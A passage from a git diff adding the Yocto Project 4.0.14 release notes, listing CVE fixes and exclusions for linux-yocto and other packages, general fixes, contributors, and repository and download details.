:cve:`2020-14351`, :cve:`2020-14353`, :cve:`2020-14356`, :cve:`2020-14381`, :cve:`2020-14385`, :cve:`2020-14386`, :cve:`2020-14390`, :cve:`2020-14416`, :cve:`2020-15393`, :cve:`2020-15436`, :cve:`2020-15437`, :cve:`2020-15780`, :cve:`2020-15852`, :cve:`2020-16119`, :cve:`2020-16120`, :cve:`2020-16166`, :cve:`2020-1749`, :cve:`2020-24394`, :cve:`2020-24490`, :cve:`2020-24586`, :cve:`2020-24587`, :cve:`2020-24588`, :cve:`2020-25211`, :cve:`2020-25212`, :cve:`2020-25221`, :cve:`2020-25284`, :cve:`2020-25285`, :cve:`2020-25639`, :cve:`2020-25641`, :cve:`2020-25643`, :cve:`2020-25645`, :cve:`2020-25656`, :cve:`2020-25668`, :cve:`2020-25669`, :cve:`2020-25670`, :cve:`2020-25671`, :cve:`2020-25672`, :cve:`2020-25673`, :cve:`2020-25704`, :cve:`2020-25705`, :cve:`2020-26088`, :cve:`2020-26139`, :cve:`2020-26141`, :cve:`2020-26145`, :cve:`2020-26147`, :cve:`2020-26541`, :cve:`2020-26555`, :cve:`2020-26558`, :cve:`2020-27066`, :cve:`2020-27067`, :cve:`2020-27068`, :cve:`2020-27152`, :cve:`2020-27170`, :cve:`2020-27171`, :cve:`2020-27194`, :cve:`2020-2732`, :cve:`2020-27418`, :cve:`2020-27673`, :cve:`2020-27675`, :cve:`2020-27777`, :cve:`2020-27784`, :cve:`2020-27786`, :cve:`2020-27815`, :cve:`2020-27820`, :cve:`2020-27825`, :cve:`2020-27830`, :cve:`2020-27835`, :cve:`2020-28097`, :cve:`2020-28374`, :cve:`2020-28588`, :cve:`2020-28915`, :cve:`2020-28941`, :cve:`2020-28974`, :cve:`2020-29368`, :cve:`2020-29369`, :cve:`2020-29370`, :cve:`2020-29371`, :cve:`2020-29372`, :cve:`2020-29373`, :cve:`2020-29374`, :cve:`2020-29534`, :cve:`2020-29568`, :cve:`2020-29569`, :cve:`2020-29660`, :cve:`2020-29661`, :cve:`2020-35499`, :cve:`2020-35508`, :cve:`2020-35513`, :cve:`2020-35519`, :cve:`2020-36158`, :cve:`2020-36310`, :cve:`2020-36311`, :cve:`2020-36312`, :cve:`2020-36313`, :cve:`2020-36322`, :cve:`2020-36385`, :cve:`2020-36386`, :cve:`2020-36387`, :cve:`2020-36516`, :cve:`2020-36557`, :cve:`2020-36558`, :cve:`2020-36691`, :cve:`2020-36694`, :cve:`2020-36766`, :cve:`2020-3702`, :cve:`2020-4788`, :cve:`2020-7053`, :cve:`2020-8428`, :cve:`2020-8647`, :cve:`2020-8648`, :cve:`2020-8649`, :cve:`2020-8694`, :cve:`2020-8834`, :cve:`2020-8835`, :cve:`2020-8992`, :cve:`2020-9383`, :cve:`2020-9391`, :cve:`2021-0129`, :cve:`2021-0342`, :cve_mitre:`2021-0447`, :cve_mitre:`2021-0448`, :cve:`2021-0512`, :cve:`2021-0605`, :cve:`2021-0707`, :cve:`2021-0920`, :cve:`2021-0929`, :cve:`2021-0935`, :cve_mitre:`2021-0937`, :cve:`2021-0938`, :cve:`2021-0941`, :cve:`2021-1048`, :cve:`2021-20177`, :cve:`2021-20194`, :cve:`2021-20226`, :cve:`2021-20239`, :cve:`2021-20261`, :cve:`2021-20265`, :cve:`2021-20268`, :cve:`2021-20292`, :cve:`2021-20317`, :cve:`2021-20320`, :cve:`2021-20321`, :cve:`2021-20322`, :cve:`2021-21781`, :cve:`2021-22543`, :cve:`2021-22555`, :cve:`2021-22600`, :cve:`2021-23133`, :cve:`2021-23134`, :cve:`2021-26401`, :cve:`2021-26708`, :cve:`2021-26930`, :cve:`2021-26931`, :cve:`2021-26932`, :cve:`2021-27363`, :cve:`2021-27364`, :cve:`2021-27365`, :cve:`2021-28038`, :cve:`2021-28039`, :cve:`2021-28375`, :cve:`2021-28660`, :cve:`2021-28688`, :cve:`2021-28691`, :cve:`2021-28711`, :cve:`2021-28712`, :cve:`2021-28713`, :cve:`2021-28714`, :cve:`2021-28715`, :cve:`2021-28950`, :cve:`2021-28951`, :cve:`2021-28952`, :cve:`2021-28964`, :cve:`2021-28971`, :cve:`2021-28972`, :cve:`2021-29154`, :cve:`2021-29155`, :cve:`2021-29264`, :cve:`2021-29265`, :cve:`2021-29266`, :cve:`2021-29646`, :cve:`2021-29647`, :cve:`2021-29648`, :cve:`2021-29649`, :cve:`2021-29650`, :cve:`2021-29657`, :cve:`2021-30002`, :cve:`2021-30178`, :cve:`2021-31440`, :cve:`2021-3178`, :cve:`2021-31829`, :cve:`2021-31916`, :cve:`2021-32399`, :cve:`2021-32606`, :cve:`2021-33033`, :cve:`2021-33034`, :cve:`2021-33098`, :cve:`2021-33135`, :cve:`2021-33200`, :cve:`2021-3347`, :cve:`2021-3348`, :cve:`2021-33624`, :cve:`2021-33655`, :cve:`2021-33656`, :cve:`2021-33909`, :cve:`2021-3411`, :cve:`2021-3428`, :cve:`2021-3444`, :cve:`2021-34556`, :cve:`2021-34693`, :cve:`2021-3483`, :cve:`2021-34866`, :cve:`2021-3489`, :cve:`2021-3490`, :cve:`2021-3491`, :cve_mitre:`2021-34981`, :cve:`2021-3501`, :cve:`2021-35039`, :cve:`2021-3506`, :cve:`2021-3543`, :cve:`2021-35477`, :cve:`2021-3564`, :cve:`2021-3573`, :cve:`2021-3587`, :cve_mitre:`2021-3600`, :cve:`2021-3609`, :cve:`2021-3612`, :cve:`2021-3635`, :cve:`2021-3640`, :cve:`2021-3653`, :cve:`2021-3655`, :cve:`2021-3656`, :cve:`2021-3659`, :cve:`2021-3679`, :cve:`2021-3715`, :cve:`2021-37159`, :cve:`2021-3732`, :cve:`2021-3736`, :cve:`2021-3739`, :cve:`2021-3743`, :cve:`2021-3744`, :cve:`2021-3752`, :cve:`2021-3753`, :cve:`2021-37576`, :cve:`2021-3759`, :cve:`2021-3760`, :cve:`2021-3764`, :cve:`2021-3772`, :cve:`2021-38160`, :cve:`2021-38166`, :cve:`2021-38198`, :cve:`2021-38199`, :cve:`2021-38200`, :cve:`2021-38201`, :cve:`2021-38202`, :cve:`2021-38203`, :cve:`2021-38204`, :cve:`2021-38205`, :cve:`2021-38206`, :cve:`2021-38207`, :cve:`2021-38208`, :cve:`2021-38209`, :cve:`2021-38300`, :cve:`2021-3894`, :cve:`2021-3896`, :cve:`2021-3923`, :cve:`2021-39633`, :cve:`2021-39634`, :cve:`2021-39636`, :cve:`2021-39648`, :cve:`2021-39656`, :cve:`2021-39657`, :cve:`2021-39685`, :cve:`2021-39686`, :cve:`2021-39698`, :cve:`2021-39711`, :cve:`2021-39713`, :cve:`2021-39714`, :cve:`2021-4001`, :cve:`2021-4002`, :cve:`2021-4028`, :cve:`2021-4032`, :cve:`2021-4037`, :cve:`2021-40490`, :cve:`2021-4083`, :cve:`2021-4090`, :cve:`2021-4093`, :cve:`2021-4095`, :cve:`2021-41073`, :cve:`2021-4135`, :cve:`2021-4148`, :cve:`2021-4149`, :cve:`2021-4154`, :cve:`2021-4155`, :cve:`2021-4157`, :cve:`2021-4159`, :cve:`2021-41864`, :cve:`2021-4197`, :cve:`2021-42008`, :cve:`2021-4202`, :cve:`2021-4203`, :cve:`2021-4218`, :cve:`2021-42252`, :cve:`2021-42327`, :cve:`2021-42739`, :cve:`2021-43056`, :cve:`2021-43057`, :cve:`2021-43267`, :cve:`2021-43389`, :cve:`2021-43975`, :cve:`2021-43976`, :cve:`2021-44733`, :cve:`2021-45095`, :cve:`2021-45100`, :cve:`2021-45402`, :cve:`2021-45469`, :cve:`2021-45480`, :cve:`2021-45485`, :cve:`2021-45486`, :cve:`2021-45868`, :cve:`2021-46283`, :cve:`2022-0001`, :cve:`2022-0002`, :cve:`2022-0168`, :cve:`2022-0171`, :cve:`2022-0185`, :cve:`2022-0264`, :cve:`2022-0286`, :cve:`2022-0322`, :cve:`2022-0330`, :cve:`2022-0433`, :cve:`2022-0435`, :cve:`2022-0487`, :cve:`2022-0492`, :cve:`2022-0494`, :cve:`2022-0516`, :cve:`2022-0617`, :cve:`2022-0644`, :cve:`2022-0646`, :cve:`2022-0742`, :cve:`2022-0812`, :cve:`2022-0847`, :cve:`2022-0850`, :cve:`2022-0854`, :cve:`2022-0995`, :cve:`2022-1011`, :cve:`2022-1012`, :cve:`2022-1015`, :cve:`2022-1016`, :cve:`2022-1043`, :cve:`2022-1048`, :cve:`2022-1055`, :cve:`2022-1158`, :cve:`2022-1184`, :cve:`2022-1195`, :cve:`2022-1198`, :cve:`2022-1199`, :cve:`2022-1204`, :cve:`2022-1205`, :cve:`2022-1353`, :cve:`2022-1419`, :cve:`2022-1462`, :cve:`2022-1516`, :cve:`2022-1651`, :cve:`2022-1652`, :cve:`2022-1671`, :cve:`2022-1678`, :cve:`2022-1679`, :cve:`2022-1729`, :cve:`2022-1734`, :cve:`2022-1786`, :cve:`2022-1789`, :cve:`2022-1836`, :cve:`2022-1852`, :cve:`2022-1882`, :cve:`2022-1943`, :cve:`2022-1966`, :cve:`2022-1972`, :cve:`2022-1973`, :cve:`2022-1974`, :cve:`2022-1975`, :cve:`2022-1976`, :cve:`2022-1998`, :cve:`2022-20008`, :cve:`2022-20132`, :cve:`2022-20141`, :cve:`2022-20153`, :cve:`2022-20154`, :cve:`2022-20158`, :cve:`2022-20166`, :cve:`2022-20368`, :cve:`2022-20369`, :cve:`2022-20421`, :cve:`2022-20422`, :cve:`2022-20423`, :cve_mitre:`2022-20565`, :cve:`2022-20566`, :cve:`2022-20567`, :cve:`2022-20572`, :cve:`2022-2078`, :cve:`2022-21123`, :cve:`2022-21125`, :cve:`2022-21166`, :cve:`2022-21385`, :cve:`2022-21499`, :cve_mitre:`2022-21505`, :cve:`2022-2153`, :cve:`2022-2196`, :cve_mitre:`2022-22942`, :cve:`2022-23036`, :cve:`2022-23037`, :cve:`2022-23038`, :cve:`2022-23039`, :cve:`2022-23040`, :cve:`2022-23041`, :cve:`2022-23042`, :cve:`2022-2308`, :cve:`2022-2318`, :cve:`2022-2380`, :cve:`2022-23816`, :cve:`2022-23960`, :cve:`2022-24122`, :cve:`2022-24448`, :cve:`2022-24958`, :cve:`2022-24959`, :cve:`2022-2503`, :cve:`2022-25258`, :cve:`2022-25375`, :cve:`2022-25636`, :cve_mitre:`2022-2585`, :cve_mitre:`2022-2586`, :cve_mitre:`2022-2588`, :cve:`2022-2590`, :cve_mitre:`2022-2602`, :cve:`2022-26365`, :cve:`2022-26373`, :cve:`2022-2639`, :cve:`2022-26490`, :cve:`2022-2663`, :cve:`2022-26966`, :cve:`2022-27223`, :cve:`2022-27666`, :cve:`2022-2785`, :cve:`2022-27950`, :cve:`2022-28356`, :cve:`2022-28388`, :cve:`2022-28389`, :cve:`2022-28390`, :cve:`2022-2873`, :cve:`2022-28796`, :cve:`2022-28893`, :cve:`2022-2905`, :cve:`2022-29156`, :cve:`2022-2938`, :cve:`2022-29581`, :cve:`2022-29582`, :cve:`2022-2959`, :cve:`2022-2964`, :cve:`2022-2977`, :cve:`2022-2978`, :cve:`2022-29900`, :cve:`2022-29901`, :cve:`2022-29968`, :cve:`2022-3028`, :cve:`2022-30594`, :cve:`2022-3061`, :cve:`2022-3077`, :cve:`2022-3078`, :cve:`2022-3103`, :cve:`2022-3104`, :cve:`2022-3105`, :cve:`2022-3106`, :cve:`2022-3107`, :cve:`2022-3110`, :cve:`2022-3111`, :cve:`2022-3112`, :cve:`2022-3113`, :cve:`2022-3114`, :cve:`2022-3115`, :cve:`2022-3169`, :cve:`2022-3170`, :cve:`2022-3202`, :cve:`2022-32250`, :cve:`2022-32296`, :cve:`2022-3239`, :cve:`2022-32981`, :cve:`2022-3303`, :cve:`2022-33740`, :cve:`2022-33741`, :cve:`2022-33742`, :cve:`2022-33743`, :cve:`2022-33744`, :cve:`2022-33981`, :cve:`2022-3424`, :cve:`2022-3435`, :cve:`2022-34494`, :cve:`2022-34495`, :cve:`2022-34918`, :cve:`2022-3521`, :cve:`2022-3524`, :cve:`2022-3526`, :cve:`2022-3531`, :cve:`2022-3532`, :cve:`2022-3534`, :cve:`2022-3535`, :cve:`2022-3541`, :cve:`2022-3542`, :cve:`2022-3543`, :cve:`2022-3545`, :cve:`2022-3564`, :cve:`2022-3565`, :cve:`2022-3577`, :cve:`2022-3586`, :cve:`2022-3594`, :cve:`2022-36123`, :cve:`2022-3619`, :cve:`2022-3621`, :cve:`2022-3623`, :cve:`2022-3625`, :cve:`2022-3628`, :cve:`2022-36280`, :cve:`2022-3629`, :cve:`2022-3630`, :cve:`2022-3633`, :cve:`2022-3635`, :cve:`2022-3640`, :cve:`2022-3643`, :cve:`2022-3646`, :cve:`2022-3649`, :cve:`2022-36879`, :cve:`2022-36946`, :cve:`2022-3707`, :cve:`2022-3910`, :cve:`2022-39189`, :cve:`2022-39190`, :cve:`2022-3977`, :cve:`2022-39842`, :cve:`2022-40307`, :cve:`2022-40476`, :cve:`2022-40768`, :cve:`2022-4095`, :cve:`2022-40982`, :cve:`2022-41218`, :cve:`2022-41222`, :cve:`2022-4127`, :cve:`2022-4128`, :cve:`2022-4129`, :cve:`2022-4139`, :cve:`2022-41674`, :cve:`2022-41849`, :cve:`2022-41850`, :cve:`2022-41858`, :cve:`2022-42328`, :cve:`2022-42329`, :cve:`2022-42432`, :cve:`2022-4269`, :cve:`2022-42703`, :cve:`2022-42719`, :cve:`2022-42720`, :cve:`2022-42721`, :cve:`2022-42722`, :cve:`2022-42895`, :cve:`2022-42896`, :cve:`2022-43750`, :cve:`2022-4378`, :cve:`2022-4379`, :cve:`2022-4382`, :cve:`2022-43945`, :cve:`2022-45869`, :cve:`2022-45886`, :cve:`2022-45887`, :cve:`2022-45888`, :cve:`2022-45919`, :cve:`2022-45934`, :cve:`2022-4662`, :cve:`2022-4744`, :cve:`2022-47518`, :cve:`2022-47519`, :cve:`2022-47520`, :cve:`2022-47521`, :cve:`2022-47929`, :cve:`2022-47938`, :cve:`2022-47939`, :cve:`2022-47940`, :cve:`2022-47941`, :cve:`2022-47942`, :cve:`2022-47943`, :cve:`2022-4842`, :cve:`2022-48423`, :cve:`2022-48424`, :cve:`2022-48425`, :cve:`2022-48502`, :cve:`2023-0030`, :cve:`2023-0045`, :cve:`2023-0047`, :cve:`2023-0122`, :cve:`2023-0160`, :cve:`2023-0179`, :cve:`2023-0210`, :cve:`2023-0240`, :cve:`2023-0266`, :cve:`2023-0394`, :cve:`2023-0458`, :cve:`2023-0459`, :cve:`2023-0461`, :cve:`2023-0468`, :cve:`2023-0469`, :cve:`2023-0590`, :cve:`2023-0615`, :cve_mitre:`2023-1032`, :cve:`2023-1073`, :cve:`2023-1074`, :cve:`2023-1076`, :cve:`2023-1077`, :cve:`2023-1078`, :cve:`2023-1079`, :cve:`2023-1095`, :cve:`2023-1118`, :cve:`2023-1192`, :cve:`2023-1194`, :cve:`2023-1195`, :cve:`2023-1206`, :cve:`2023-1249`, :cve:`2023-1252`, :cve:`2023-1281`, :cve:`2023-1380`, :cve:`2023-1382`, :cve:`2023-1390`, :cve:`2023-1513`, :cve:`2023-1582`, :cve:`2023-1583`, :cve:`2023-1611`, :cve:`2023-1637`, :cve:`2023-1652`, :cve:`2023-1670`, :cve:`2023-1829`, :cve:`2023-1838`, :cve:`2023-1855`, :cve:`2023-1859`, :cve:`2023-1989`, :cve:`2023-1990`, :cve:`2023-1998`, :cve:`2023-2002`, :cve:`2023-2006`, :cve:`2023-2008`, :cve:`2023-2019`, :cve:`2023-20569`, :cve:`2023-20588`, :cve:`2023-20593`, :cve:`2023-20938`, :cve:`2023-21102`, :cve:`2023-21106`, :cve:`2023-2124`, :cve:`2023-21255`, :cve:`2023-21264`, :cve:`2023-2156`, :cve:`2023-2162`, :cve:`2023-2163`, :cve:`2023-2166`, :cve:`2023-2177`, :cve:`2023-2194`, :cve:`2023-2235`, :cve:`2023-2236`, :cve:`2023-2248`, :cve:`2023-2269`, :cve:`2023-22996`, :cve:`2023-22997`, :cve:`2023-22998`, :cve:`2023-22999`, :cve:`2023-23001`, :cve:`2023-23002`, :cve:`2023-23003`, :cve:`2023-23004`, :cve:`2023-23005`, :cve:`2023-23006`, :cve:`2023-23454`, :cve:`2023-23455`, :cve:`2023-23559`, :cve:`2023-2483`, :cve:`2023-25012`, :cve:`2023-2513`, :cve:`2023-25775`, :cve:`2023-2598`, :cve:`2023-26544`, :cve:`2023-26545`, :cve:`2023-26605`, :cve:`2023-26606`, :cve:`2023-26607`, :cve:`2023-28327`, :cve:`2023-28328`, :cve:`2023-28410`, :cve:`2023-28464`, :cve:`2023-28466`, :cve:`2023-2860`, :cve:`2023-28772`, :cve:`2023-28866`, :cve:`2023-2898`, :cve:`2023-2985`, :cve:`2023-3006`, :cve:`2023-30456`, :cve:`2023-30772`, :cve:`2023-3090`, :cve:`2023-3106`, :cve:`2023-3111`, :cve:`2023-3117`, :cve:`2023-31248`, :cve:`2023-3141`, :cve:`2023-31436`, :cve:`2023-3159`, :cve:`2023-3161`, :cve:`2023-3212`, :cve:`2023-3220`, :cve:`2023-32233`, :cve:`2023-32247`, :cve:`2023-32248`, :cve:`2023-32250`, :cve:`2023-32252`, :cve:`2023-32254`, :cve:`2023-32257`, :cve:`2023-32258`, :cve:`2023-32269`, :cve:`2023-3268`, :cve:`2023-3269`, :cve:`2023-3312`, :cve:`2023-3317`, :cve:`2023-33203`, :cve:`2023-33250`, :cve:`2023-33288`, :cve:`2023-3338`, :cve:`2023-3355`, :cve:`2023-3357`, :cve:`2023-3358`, :cve:`2023-3359`, :cve:`2023-3390`, :cve:`2023-33951`, :cve:`2023-33952`, :cve:`2023-34255`, :cve:`2023-34256`, :cve:`2023-34319`, :cve:`2023-3439`, :cve:`2023-35001`, :cve:`2023-3567`, :cve:`2023-35788`, :cve:`2023-35823`, :cve:`2023-35824`, :cve:`2023-35826`, :cve:`2023-35828`, :cve:`2023-35829`, :cve:`2023-3609`, :cve:`2023-3610`, :cve:`2023-3611`, :cve:`2023-37453`, :cve:`2023-3772`, :cve:`2023-3773`, :cve:`2023-3776`, :cve:`2023-3777`, :cve:`2023-3812`, :cve:`2023-38409`, :cve:`2023-38426`, :cve:`2023-38427`, :cve:`2023-38428`, :cve:`2023-38429`, :cve:`2023-38430`, :cve:`2023-38431`, :cve:`2023-38432`, :cve:`2023-3863`, :cve_mitre:`2023-3865`, :cve_mitre:`2023-3866`, :cve_mitre:`2023-3867`, :cve:`2023-39189`, :cve:`2023-39192`, :cve:`2023-39193`, :cve:`2023-39194`, :cve:`2023-4004`, :cve:`2023-4015`, :cve:`2023-40283`, :cve:`2023-4128`, :cve:`2023-4132`, :cve:`2023-4147`, :cve:`2023-4155`, :cve:`2023-4194`, :cve:`2023-4206`, :cve:`2023-4207`, :cve:`2023-4208`, :cve:`2023-4273`, :cve:`2023-42752`, :cve:`2023-42753`, :cve:`2023-42755`, :cve:`2023-42756`, :cve:`2023-4385`, :cve:`2023-4387`, :cve:`2023-4389`, :cve:`2023-4394`, :cve:`2023-44466`, :cve:`2023-4459`, :cve:`2023-4569`, :cve:`2023-45862`, :cve:`2023-45871`, :cve:`2023-4611`, :cve:`2023-4623`, :cve:`2023-4732`, :cve:`2023-4921` and :cve:`2023-5345` +- linux-yocto/5.15: Ignore :cve:`2022-45886`, :cve:`2022-45887`, :cve:`2022-45919`, :cve:`2022-48502`, :cve:`2023-0160`, :cve:`2023-1206`, :cve:`2023-20593`, :cve:`2023-21264`, :cve:`2023-2898`, :cve:`2023-31248`, :cve:`2023-33250`, :cve:`2023-34319`, :cve:`2023-35001`, :cve:`2023-3611`, :cve:`2023-37453`, :cve:`2023-3773`, :cve:`2023-3776`, :cve:`2023-3777`, :cve:`2023-38432`, :cve:`2023-3863`, :cve_mitre:`2023-3865`, :cve_mitre:`2023-3866`, :cve:`2023-4004`, :cve:`2023-4015`, :cve:`2023-4132`, :cve:`2023-4147`, :cve:`2023-4194`, :cve:`2023-4385`, :cve:`2023-4387`, :cve:`2023-4389`, :cve:`2023-4394`, :cve:`2023-4459` and :cve:`2023-4611` +- openssl: Fix :cve:`2023-4807` and :cve:`2023-5363` +- python3-git: Fix :cve:`2023-40590` and :cve:`2023-41040` +- python3-urllib3: Fix :cve:`2023-43804` +- qemu: Ignore :cve:`2023-2680` +- ruby: Fix :cve:`2023-36617` +- shadow: Fix :cve_mitre:`2023-4641` +- tiff: Fix :cve:`2023-3576` and :cve:`2023-40745` +- vim: Fix :cve:`2023-5441` and :cve:`2023-5535` +- webkitgtk: Fix :cve:`2023-32439` +- xdg-utils: Fix :cve:`2022-4055` +- xserver-xorg: ignore :cve:`2022-3553` (XQuartz-specific) +- zlib: Fix :cve:`2023-45853` + + + +Fixes in Yocto-4.0.14 +~~~~~~~~~~~~~~~~~~~~~ + +- SECURITY.md: Add file +- apt: add missing <cstdint> for uint16_t +- bind: update to 9.18.19 +- bitbake: SECURITY.md: add file +- bitbake: bitbake-getvar: Add a quiet command line argument +- bitbake: bitbake-worker/runqueue: Avoid unnecessary bytes object copies +- brief-yoctoprojectqs: use new CDN mirror for sstate +- bsp-guide: bsp.rst: replace reference to wiki +- bsp-guide: bsp: skip Intel machines no longer supported in Poky +- build-appliance-image: Update to kirkstone head revision +- ccache: fix build with gcc-13 +- cml1: Fix KCONFIG_CONFIG_COMMAND not conveyed fully in do_menuconfig +- contributor-guide/style-guide: Add a note about task idempotence +- contributor-guide/style-guide: Refer to recipes, not packages +- contributor-guide: deprecate "Accepted" patch status +- contributor-guide: discourage marking patches as Inappropriate +- contributor-guide: recipe-style-guide: add more patch tagging examples +- contributor-guide: recipe-style-guide: add section about CVE patches +- contributor-guide: style-guide: discourage using Pending patch status +- dev-manual: add security team processes +- dev-manual: fix testimage usage instructions +- dev-manual: layers: Add notes about layer.conf +- dev-manual: new-recipe.rst: add missing parenthesis to "Patching Code" section +- dev-manual: new-recipe.rst: replace reference to wiki +- dev-manual: start.rst: remove obsolete reference +- dev-manual: wic: update "wic list images" output +- dev/ref-manual: Document :term:`INIT_MANAGER` +- fontcache.bbclass: avoid native recipes depending on target fontconfig +- glibc: Update to latest on stable 2.35 branch (c84018a05aec..) +- json-c: define :term:`CVE_VERSION` +- kernel.bbclass: Add force flag to rm calls +- libxpm: upgrade to 3.5.17 +- linux-firmware: create separate packages +- linux-firmware: upgrade to 20230804 +- linux-yocto/5.10: update to v5.10.197 +- linux-yocto: update CVE exclusions +- manuals: correct "yocto-linux" by "linux-yocto" +- manuals: update linux-yocto append examples +- migration-guides: add release notes for 4.0.13 +- openssl: Upgrade to 3.0.12 +- overview: Add note about non-reproducibility side effects +- package_rpm: Allow compression mode override +- poky.conf: bump version for 4.0.14 +- profile-manual: aesthetic cleanups +- python3-git: upgrade to 3.1.37 +- python3-jinja2: fix for the ptest result format +- python3-urllib3: upgrade to 1.26.17 +- ref-manual: Fix :term:`PACKAGECONFIG` term and add an example +- ref-manual: Warn about :term:`COMPATIBLE_MACHINE` skipping native recipes +- ref-manual: releases.svg: Scarthgap is now version 5.0 +- ref-manual: variables: add :term:`RECIPE_SYSROOT` and :term:`RECIPE_SYSROOT_NATIVE` +- ref-manual: variables: add :term:`TOOLCHAIN_OPTIONS` variable +- ref-manual: variables: add example for :term:`SYSROOT_DIRS` variable +- ref-manual: variables: provide no-match example for :term:`COMPATIBLE_MACHINE` +- sdk-manual: appendix-obtain: improve and update descriptions +- test-manual: reproducible-builds: stop mentioning LTO bug +- uboot-extlinux-config.bbclass: fix missed override syntax migration +- vim: Upgrade to 9.0.2048 + + +Known Issues in Yocto-4.0.14 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- N/A + + +Contributors to Yocto-4.0.14 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- Alexander Kanavin +- Archana Polampalli +- Armin Kuster +- Arne Schwerdt +- BELHADJ SALEM Talel +- Bruce Ashfield +- Chaitanya Vadrevu +- Colin McAllister +- Deepthi Hemraj +- Etienne Cordonnier +- Fahad Arslan +- Hitendra Prajapati +- Jaeyoon Jung +- Joshua Watt +- Khem Raj +- Lee Chee Yang +- Marta Rybczynska +- Martin Jansa +- Meenali Gupta +- Michael Opdenacker +- Narpat Mali +- Niko Mauno +- Paul Eggleton +- Paulo Neves +- Peter Marko +- Quentin Schulz +- Richard Purdie +- Robert P. J. Day +- Roland Hieber +- Ross Burton +- Ryan Eatmon +- Shubham Kulkarni +- Siddharth Doshi +- Soumya Sambu +- Steve Sakoman +- Tim Orling +- Trevor Gamblin +- Vijay Anusuri +- Wang Mingyu +- Yash Shinde +- Yogita Urade + + +Repositories / Downloads for Yocto-4.0.14 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +poky + +- Repository Location: :yocto_git:`/poky` +- Branch: :yocto_git:`kirkstone </poky/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.14 </poky/log/?h=yocto-4.0.14>` +- Git Revision: :yocto_git:`d8d6d921fad14b82167d9f031d4fca06b5e01883 </poky/commit/?id=d8d6d921fad14b82167d9f031d4fca06b5e01883>` +- Release Artefact: poky-d8d6d921fad14b82167d9f031d4fca06b5e01883 +- sha: 46a6301e3921ee67cfe6be7ea544d6257f0c0f02ef15c5091287e024ff02d5f5 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/poky-d8d6d921fad14b82167d9f031d4fca06b5e01883.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/poky-d8d6d921fad14b82167d9f031d4fca06b5e01883.tar.bz2 + +openembedded-core + +- Repository Location: :oe_git:`/openembedded-core` +- Branch: :oe_git:`kirkstone </openembedded-core/log/?h=kirkstone>` +- Tag: :oe_git:`yocto-4.0.14 </openembedded-core/log/?h=yocto-4.0.14>` +- Git Revision: :oe_git:`0eb8e67aa6833df0cde29833568a70e65c21d7e5 </openembedded-core/commit/?id=0eb8e67aa6833df0cde29833568a70e65c21d7e5>` +- Release Artefact: oecore-0eb8e67aa6833df0cde29833568a70e65c21d7e5 +- sha: d510a7067b87ba935b8a7c9f9608d0e06b057009ea753ed190ddfacc7195ecc5 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/oecore-0eb8e67aa6833df0cde29833568a70e65c21d7e5.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/oecore-0eb8e67aa6833df0cde29833568a70e65c21d7e5.tar.bz2 + +meta-mingw + +- Repository Location: :yocto_git:`/meta-mingw` +- Branch: :yocto_git:`kirkstone </meta-mingw/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.14 </meta-mingw/log/?h=yocto-4.0.14>` +- Git Revision: :yocto_git:`f6b38ce3c90e1600d41c2ebb41e152936a0357d7 </meta-mingw/commit/?id=f6b38ce3c90e1600d41c2ebb41e152936a0357d7>` +- Release Artefact: meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7 +- sha: 7d57167c19077f4ab95623d55a24c2267a3a3fb5ed83688659b4c03586373b25 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2 + +meta-gplv2 + +- Repository Location: :yocto_git:`/meta-gplv2` +- Branch: :yocto_git:`kirkstone </meta-gplv2/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.14 </meta-gplv2/log/?h=yocto-4.0.14>` +- Git Revision: :yocto_git:`d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a </meta-gplv2/commit/?id=d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a>` +- Release Artefact: meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a +- sha: c386f59f8a672747dc3d0be1d4234b6039273d0e57933eb87caa20f56b9cca6d +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2 + +bitbake + +- Repository Location: :oe_git:`/bitbake` +- Branch: :oe_git:`2.0 </bitbake/log/?h=2.0>` +- Tag: :oe_git:`yocto-4.0.14 </bitbake/log/?h=yocto-4.0.14>` +- Git Revision: :oe_git:`6c1ffa9091d0c53a100e8c8c15122d28642034bd </bitbake/commit/?id=6c1ffa9091d0c53a100e8c8c15122d28642034bd>` +- Release Artefact: bitbake-6c1ffa9091d0c53a100e8c8c15122d28642034bd +- sha: 1ceffc3b3359063341530c989a3606c897d862b61111538e683f101b02a360a2 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/bitbake-6c1ffa9091d0c53a100e8c8c15122d28642034bd.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/bitbake-6c1ffa9091d0c53a100e8c8c15122d28642034bd.tar.bz2 + +yocto-docs + +- Repository Location: :yocto_git:`/yocto-docs` +- Branch: :yocto_git:`kirkstone </yocto-docs/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.14 </yocto-docs/log/?h=yocto-4.0.14>` +- Git Revision: :yocto_git:`260b446a1a75d99399a3421cd8d6ba276f508f37 </yocto-docs/commit/?id=260b446a1a75d99399a3421cd8d6ba276f508f37>` + diff --git a/poky/documentation/migration-guides/release-notes-4.0.15.rst b/poky/documentation/migration-guides/release-notes-4.0.15.rst new file mode 100644 index 0000000000..b2731530e8 --- /dev/null +++ 